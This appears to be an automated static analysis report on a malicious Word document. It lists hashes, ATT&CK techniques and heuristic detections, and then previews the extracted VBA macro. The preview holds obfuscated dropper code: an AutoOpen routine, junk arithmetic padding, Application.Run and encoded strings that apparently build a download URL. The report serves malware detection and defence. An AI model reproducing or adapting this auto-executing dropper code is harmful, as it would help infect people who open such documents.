Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 619af6c8d64fe26c…

MALICIOUS

Office (OLE)

Size: 250.5 KB
Created: 2018-01-31 11:24:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07
MD5: 531b302092c0d33f16deae5fa889fcb6
SHA-1: 34836af056be668765ba1ae09830a3a40c676bbf
SHA-256: 619af6c8d64fe26c57fa2251174bb9840e1681344ef0a4b614e01d7a99c7be8a
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function and Application.Run to execute arbitrary code, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for malicious content.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 92035 bytes
SHA-256: eb3989a6dad51ec3b4b59872480eda9062f8f6c2df8bd6bc517436bd93af1295

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cqTXrplDpUnSQG"
Sub AutoOpen()
On Error Resume Next
WKDljpcBl = 7816985 + RNfTuOVbVHFJC - OPIb2 / Log(zfuDiCVUKlwHw / Int(jqViUYAAlv) - 8104359 * XbMmQAAt) / Qnf + Hex(JhwHmTzCtWmQ) / (rflWpirwuwNRft - Int(XUwHFqZI) - 4555556 * ChrW(5357988 / EDwrYDwZkhAu + WBiPjkpH - CByte(5082021 + CLng(7925998 + ChrW(5945869) - 4939642 - Chr(fLGRWNuHZoA)))))
CaJVFJbWZ = 7293911 + DIKZmmaiNTRw - OPIb2 / Log(lSSKnzDzNi / Int(JbTBROHzo) - 9000053 * wHwbIhua) / Qnf + Hex(kblkmqQjainq) / (zQLTYNzLSKd - Int(ULOMrWCmAch) - 7951842 * ChrW(6658578 / azYZFHRYK + PoIhaWSQIHS - CByte(6055211 + CLng(429333 + ChrW(4582822) - 6771654 - Chr(lDZUiWkJ)))))
mCmsFVLvA = 6571682 + CNUMiJRjbzvvAp - OPIb2 / Log(WOzpzsDzvYjZL / Int(vWiUbjzQrvLR) - 7979061 * LrGmCNzz) / Qnf + Hex(LlDzOZnvkFufbQ) / (ZJtFWEifDtn - Int(RwWwmwZ) - 3783709 * ChrW(6731380 / hlqDzaMvik + fNtTuasjFAF - CByte(5057046 + CLng(4083270 + ChrW(4314608) - 9715738 - Chr(HHjBwsBcI)))))
OTEDTIPDd = 7250666 + disYjndXbKVh - OPIb2 / Log(NEnzidn / Int(QLfGocmr) - 8012111 * rkPkdPIVJP) / Qnf + Hex(AztmCqOVRVz) / (XMSNRsKqfmoiwl - Int(bXpNUYhQOmU) - 7218542 * ChrW(7475196 / WXArmsXLCq + zYzOJOpQMnz - CByte(5453114 + CLng(1662497 + ChrW(6079507) - 5047713 - Chr(vDawGXSIOnmKt)))))
Application.Run "jjjEtqsJazK", YczZoHEbXZT
FQVzkUziC = 1078916 + fUalZvsMMC - OPIb2 / Log(HbtVcGqzVcf / Int(GWbdYKaHtw) - 694645 * mzhjTvZwr) / Qnf + Hex(IuFOssrCkuz) / (TOzSTBluiJXbjf - Int(HjaChfdNjX) - 1933628 * ChrW(3545148 / QrNJSodSlBbY + zvzXdiNT - CByte(7050170 + CLng(4140646 + ChrW(1923736) - 8392721 - Chr(RqAQuJiDi)))))
qvOJuBGVf = 9703697 + UihOJufFOfV - OPIb2 / Log(RAXnSUG / Int(pJTFEIUjM) - 2442886 * pLNzjImGz) / Qnf + Hex(dpwUrzIXNoA) / (joLOcKBZvt - Int(QjsEDni) - 6162107 * ChrW(2728294 / nLUUkMLL + wYOQfYlU - CByte(6247354 + CLng(5412706 + ChrW(1017306) - 5039000 - Chr(kniozsFkjImS)))))
scrurzqNj = 9030184 + BPNfSSwDIjE - OPIb2 / Log(jmvNSGbOPcw / Int(vuaoiPMzpKhZ) - 7258915 * nSlEdlnCK) / Qnf + Hex(wjXHIjNY) / (bjXrJZtUF - Int(WFWbFTJdLzNw) - 8753852 * ChrW(6772872 / svrErJwII + dPabfjQh - CByte(3302473 + CLng(7755890 + ChrW(522002) - 4912621 - Chr(SnwCCZCc)))))
qoYRdBPOb = 5053734 + NRbEiBfPwQcuQS - OPIb2 / Log(ZRsGtjFhnaCKB / Int(BTpOGLqqjQBX) - 1771727 * MOtIwqc) / Qnf + Hex(WUjMHjoijrdivz) / (jJHwiibFWazV - Int(juLLFDwVht) - 732180 * ChrW(1352432 / FkJtbLP + MwrttPvPKmI - CByte(2685225 + CLng(3029811 + ChrW(9513773) - 7283497 - Chr(ScrARzQDpjd)))))
End Sub
Function YczZoHEbXZT()
On Error Resume Next
wOwisQ = ("FjG%143Q164m56v156E154v57d165Q151m144E107B114E64d123d167-77-150-164Q164-160E72%57v57v154%157O167O143B157O163E164B167v14whJPAFZj")
WukPKTFmkU = 6339009 + MwzfBHkiPQ - OPIb2 / Log(naNwLBLpdPkOhO / Int(NiKWqHaVzSNYD) - 6288725 * EFrhqPLrCYPYDK) / Qnf + Hex(kSRIuGUsZqM) / (OjwdIIi - Int(iXzXdBmH) - 9586109 * ChrW(5257498 / XLWhvGumpkNR + iJzKEuGPVzzNS - CByte(8854122 + CLng(5811045 + ChrW(8622642) - 3748868 - Chr(uwHpurwD)))))
pRDRfRzjPaK = 4480842 + WtaRGJtUD - OPIb2 / Log(DCUTBLZUcMQ / Int(VYSSipPGMAXstc) - 4775266 * HJAJprIrdon) / Qnf + Hex(RdaKzcXCznaE) / (zPCfbaZ - Int(uNTLGEdPaouBj) - 7831072 * ChrW(6653479 / MvQFWfTjwEr + GMCNOvXQHzq - CByte(4613731 + CLng(8789466 + ChrW(7509042) - 4879681 - Chr(fCYIjcSjJUQOtk)))))
NwzAzPlnJS = Mid(wOwisQ, 4, 116)
HbLRRYNL = ("BzY2NoXFo3M0U164%164%160Q72m57%57U162E141%143Q145m146%151FKzbsanAcc8sEw6bkMiJEw")
TrfiCO = 9847849 + HCOiILIPGOmF - OPIb2 / Log(WpjPYozNnNaiPY / Int(UIMKjIUJzsi) - 3501687 * JEQiiLmQOpp) / Qnf + Hex(CTTpoAsm) / (vwBbVnCfjXq - Int(UEizrzDmNF) - 3517178 * ChrW(4335514 / hpAULrpfzOFOHN + kliSzoiPkr - CByte(9501136 + CLng(241700 + ChrW(7880126) - 9982276 - Chr(pjfbnzBKY)))))
tJUQLj = 6043762 + qUpdjjm - OPIb2 / Log(CcazXLzaPdN / Int(AfjYZjfZaiaGn) - 9708835 * NZHINPJznPjIQo) / Qnf + Hex(mhKoAKlQEz) / (MEUCUMY - Int(mBIUA
... (truncated)